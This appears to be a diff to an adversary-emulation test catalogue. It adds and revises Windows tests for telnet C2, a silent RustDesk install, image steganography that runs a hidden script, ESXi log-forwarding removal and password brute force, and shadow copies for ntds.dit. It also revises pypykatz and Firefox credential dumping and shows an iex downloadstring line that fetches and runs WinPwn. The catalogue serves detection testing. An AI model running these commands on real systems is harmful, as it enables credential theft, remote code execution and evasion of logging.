+      auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
+      description: 'An adversary may establish telnet communication from compromised
+        endpoint to command and control (C2) server to be able to operate more attack
+        on objectives.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Command and Control (C2) server cam be established by running
+          PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with
+          specified IP that must be reachable by client (telnet_client.exe)
+
+          '
+        prereq_command: |
+          $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+          if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+        get_prereq_command: 'Write-Host "Setup C2 server manually"
+
+          '
+      input_arguments:
+        server_ip:
+          description: C2 server IP or URL
+          type: url
+          default: 127.0.0.1
+        client_path:
+          description: Client agent path
+          type: url
+          default: PathToAtomicsFolder\T1071\bin\telnet_client.exe
+        server_port:
+          description: C2 server port
+          type: Integer
+          default: 23
+      executor:
+        command: "#{client_path} #{server_ip} --port #{server_port}\n"
+        name: powershell
   T1219:
     technique:
       modified: '2023-09-28T16:23:51.194Z'
@@ -58247,6 +58703,22 @@ command-and-control:
           '
         name: powershell
         elevation_required: true
+    - name: RustDesk Files Detected Test on Windows
+      auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e
+      description: "An adversary may attempt to trick the user into downloading RustDesk
+        and use this to maintain access to the machine. \nDownload of RustDesk installer
+        will be at the destination location when successfully executed.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+          Start-Process -FilePath $file "/S"
+        cleanup_command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Remove-Item $file1 -ErrorAction Ignore
+        name: powershell
   T1659:
     technique:
       modified: '2023-10-01T02:28:45.147Z'
@@ -60098,9 +60570,9 @@ command-and-control:
           '
         get_prereq_command: |
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+          Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
           Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
       executor:
@@ -60837,7 +61309,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -60859,7 +61331,156 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-    atomic_tests: []
+      identifier: T1001.002
+    atomic_tests:
+    - name: Steganographic Tarball Embedding
+      auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+      description: "This atomic test, named \"Steganographic Tarball Embedding\",
+        simulates the technique of data obfuscation via steganography by embedding
+        a tar archive file (tarball) \nwithin an image.\n\nThe test begins by ensuring
+        the availability of the image file and the tarball file containing data .
+        It then generates random passwords and saves them to a \nfile. Subsequently,
+        the tarball file is created, containing the passwords file. The test executor
+        command reads the contents of the image \nfile and the tarball file as byte
+        arrays and appends them together to form a new image file. This process effectively
+        embeds the tarball \nfile within the image, utilizing steganography techniques
+        for data obfuscation.\n\nThis atomic test simulates the technique of data
+        obfuscation via steganography, enabling attackers to clandestinely transfer
+        files across systems undetected. \nBy embedding the tarball file within the
+        image, adversaries can obscure their activities, facilitating covert communication
+        and data exfiltration.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Image file which will be downloaded to be used to hide data
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+        tar_file:
+          description: Tarz file containing random passwords
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002.tarz"
+        new_image_file:
+          description: new image file ready for extraction
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002New.jpg"
+        passwords_file:
+          description: Text file containing random passwords
+          type: path
+          default: "$env:TEMP\\random_passwords.txt"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: 'File to hide within tarz file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: "Write-Output \"Generating random passwords and saving
+          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
+          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
+          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+      - description: "Tarz file to embed in image must exist \n"
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount
+          0 | Set-Content "#{new_image_file}" -Encoding byte
+
+          '
+        cleanup_command: |
+          Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+          Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+    - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+      auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+      description: "This atomic test demonstrates the technique of data obfuscation
+        via steganography, where a PowerShell script is concealed within an image
+        file. \nThe PowerShell script is embedded using steganography techniques,
+        making it undetectable by traditional security measures. The script is hidden
+        \nwithin the pixels of the image, enabling attackers to covertly transfer
+        and execute malicious code across systems.\n\nThe test begins by ensuring
+        the availability of the malicious image file and the Extract-Invoke-PSImage
+        script. The test proceeds to extract the hidden \nPowerShell script (decoded.ps1)
+        from the image file using the Extract-Invoke-PSImage tool. The extracted script
+        is then decoded from base64 encoding and saved as a \nseparate PowerShell
+        (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.\n\nIn
+        the case of this atomic test, the malicious image file which is downloaded
+        has the powershell command Start-Process notepad embedded within in base64.
+        This\nis done to emulate an attackers behaviour in the case they were to execute
+        malware embedded within the image file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Malicious Image file which will be downloaded
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+        psimage_script:
+          description: Extract-Invoke-PSImage Script downloaded
+          type: path
+          default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: 'Extract-Invoke-PSImage must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "cd \"PathToAtomicsFolder\\ExternalPayloads\\\"\nImport-Module .\\Extract-Invoke-PSImage.ps1\n$extractedScript=Extract-Invoke-PSImage
+          -Image \"#{image_file}\" -Out \"$HOME\\result.ps1\"\n$scriptContent = Get-Content
+          \"$HOME\\result.ps1\" -Raw\n$base64Pattern = \"(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])\"\n$base64Strings
+          = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value
+          }\n$base64Strings | Set-Content \"$HOME\\decoded.ps1\"\n$decodedContent
+          = Get-Content \"$HOME\\decoded.ps1\" -Raw\n$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))\n$textPattern
+          = '^.+'  \n$textMatches = [regex]::Matches($decodedText, $textPattern) |
+          ForEach-Object { $_.Value }\n$scriptPath = \"$HOME\\textExtraction.ps1\"\n$textMatches
+          -join '' | Set-Content -Path $scriptPath\n. \"$HOME\\textExtraction.ps1\"\n"
+        cleanup_command: "Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction
+          Ignore\nRemove-Item -Path \"$HOME\\result.ps1\" -Force -ErrorAction Ignore
+          \nRemove-Item -Path \"$HOME\\textExtraction.ps1\" -Force -ErrorAction Ignore\nRemove-Item
+          -Path \"$HOME\\decoded.ps1\" -Force -ErrorAction Ignore\n"
   T1008:
     technique:
       x_mitre_platforms:
@@ -61327,6 +61948,65 @@ collection:
           >nul 2>&1
 
           '
+    - name: ESXi - Remove Syslog remote IP
+      auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+      description: 'An adversary may edit the syslog config to remove the loghost
+        in order to prevent or redirect logs being received by SIEM.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: Username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "# Extract line with IP address from the syslog configuration output\n#{plink_file}
+          -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt
+          | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n#
+          Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username}
+          -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n#
+          Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath
+          = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath
+          -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n    Write-Host
+          \"The content is $fileContent\"\n    Write-Host \"The file is empty\"\n}
+          else {\n    # Use a regular expression to extract IP addresses\n    $ipAddresses
+          = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n
+          \   \n    $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n
+          \   $output | Out-File -FilePath $outputFilePath -Encoding ascii\n    \n
+          \   Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n"
+        cleanup_command: |
+          # Re-add the initially extracted IP
+          #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+          rm c:\temp\loghost_ip.txt
+          rm c:\temp\loghost.txt
+        name: powershell
+        elevation_required: true
   T1113:
     technique:
       modified: '2023-03-30T21:01:39.967Z'
@@ -67129,6 +67809,46 @@ credential-access:
         command: "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe
           bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt
           TestUser1 \n"
+    - name: ESXi - Brute Force Until Account Lockout
+      auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+      description: |
+        An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+        In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        lockout_threshold:
+          description: Specify the account lockout threshold configured on the ESXI
+            management server
+          type: string
+          default: '5'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: |
+          $lockout_threshold = [int]"#{lockout_threshold}"
+          for ($var = 1; $var -le $lockout_threshold; $var++) {
+            #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+            }
+        name: powershell
+        elevation_required: false
   T1003:
     technique:
       x_mitre_platforms:
@@ -67641,44 +68361,51 @@ credential-access:
         elevation_required: true
     - name: Registry parse with pypykatz
       auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-      description: 'Parses registry hives to obtain stored credentials
+      description: |
+        Parses registry hives to obtain stored credentials.
 
-        '
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
       supported_platforms:
       - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+      dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must have python 3 installed
 
           '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "Python 3 must be installed manually"
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
 
           '
-      - description: 'Computer must have pip installed
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "PIP must be installed manually"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
 
           '
-      - description: 'pypykatz must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"
 
           '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null
 
           '
       executor:
-        command: 'pypykatz live registry
-
-          '
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
         name: command_prompt
         elevation_required: true
     - name: esentutl.exe SAM copy
@@ -69751,14 +70478,16 @@ credential-access:
       auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
       description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
         Firefox) passwords.\nUpon successful execution, the decrypted credentials
-        will be output to a text file, as well as displayed on screen. \n"
+        will be output to a text file, as well as displayed on screen. \n\nWill create
+        a Python virtual environment within the External Payloads folder that can
+        be deleted manually post test execution.\n"
       supported_platforms:
       - windows
       input_arguments:
         Firepwd_Path:
           description: Filepath for Firepwd.py
           type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
         Out_Filepath:
           description: Filepath to output results to
           type: string
@@ -69771,17 +70500,12 @@ credential-access:
           description: Filepath to python
           type: string
           default: C:\Program Files\Python310\python.exe
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
       dependency_executor_name: powershell
       dependencies:
-      - description: 'Firepwd must exist at #{Firepwd_Path}
-
-          '
-        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
       - description: 'Firefox profile directory must be present
 
           '
@@ -69817,36 +70541,52 @@ credential-access:
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Pip must be installed.
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: 'Firepwd must exist at #{Firepwd_Path}
+
+          '
+        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
       - description: "Pycryptodome library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pycryptodome) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe
+          install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" |
+          out-null} else {write-host "Visual Studio Build Tools (C++ Support) must
+          be installed to continue gathering this prereq"}
+
+          '
       - description: "Pyasn1 library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pyasn1) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe
+          install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null}
+          else {write-host "Visual Studio Build Tools (C++ Support) must be installed
+          to continue gathering this prereq."}
+
+          '
       executor:
         name: powershell
         command: |
           $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-          cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+          cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
           cat #{Out_Filepath}
         cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
           \  \n"
@@ -70882,42 +71622,50 @@ credential-access:
         Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
 
         Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
       supported_platforms:
       - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+      dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must have python 3 installed
 
           '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
         get_prereq_command: |
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'pypykatz must be installed and part of PATH
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
 
           '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null
 
           '
       executor:
-        command: 'pypykatz live lsa
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
+        cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul
 
           '
         name: command_prompt
@@ -74370,6 +75118,24 @@ credential-access:
           mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         name: command_prompt
         elevation_required: true
+    - name: Create Volume Shadow Copy with diskshadow
+      auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+      description: |
+        This test is intended to be run on a domain controller
+        An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the script
+          type: Path
+          default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+      executor:
+        command: |
+          mkdir c:\exfil
+          diskshadow.exe /s #{filename}
+        name: command_prompt
+        elevation_required: true
   T1558.003:
     technique:
       modified: '2023-03-30T21:01:46.538Z'
@@ -77494,6 +78260,15 @@ discovery:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           printercheck -noninteractive -consoleoutput
         name: powershell
+    - name: Peripheral Device Discovery via fsutil
+      auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
+      description: Performs pheripheral device discovery utilizing fsutil to list
+        all drives.
+      supported_platforms:
+      - windows
+      executor:
+        command: fsutil fsinfo drives
+        name: command_prompt
   T1082:
     technique:
       modified: '2023-03-30T21:01:40.871Z'
@@ -79438,6 +80213,20 @@ discovery:
           Ignore"
         name: powershell
         elevation_required: true
+    - name: Enumerate Windows Security Log via WevtUtil
+      auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd
+      description: "WevtUtil is a command line tool that can be utilised by adversaries
+        to gather intelligence on a targeted Windows system's logging infrastructure.
+        \n\nBy executing this command, malicious actors can enumerate all available
+        event logs, including both default logs such as Application, Security, and
+        System\nas well as any custom logs created by administrators. \n\nThis information
+        provides valuable insight into the system's logging mechanisms, potentially
+        allowing attackers to identify gaps or weaknesses in the logging configuration"
+      supported_platforms:
+      - windows
+      executor:
+        command: wevtutil enum-logs
+        name: command_prompt
   T1087.004:
     technique:
       x_mitre_platforms:
@@ -80769,40 +81558,47 @@ discovery:
           description: hostname or ip address to connect to.
           type: string
           default: 192.168.1.1
+        venv_path:
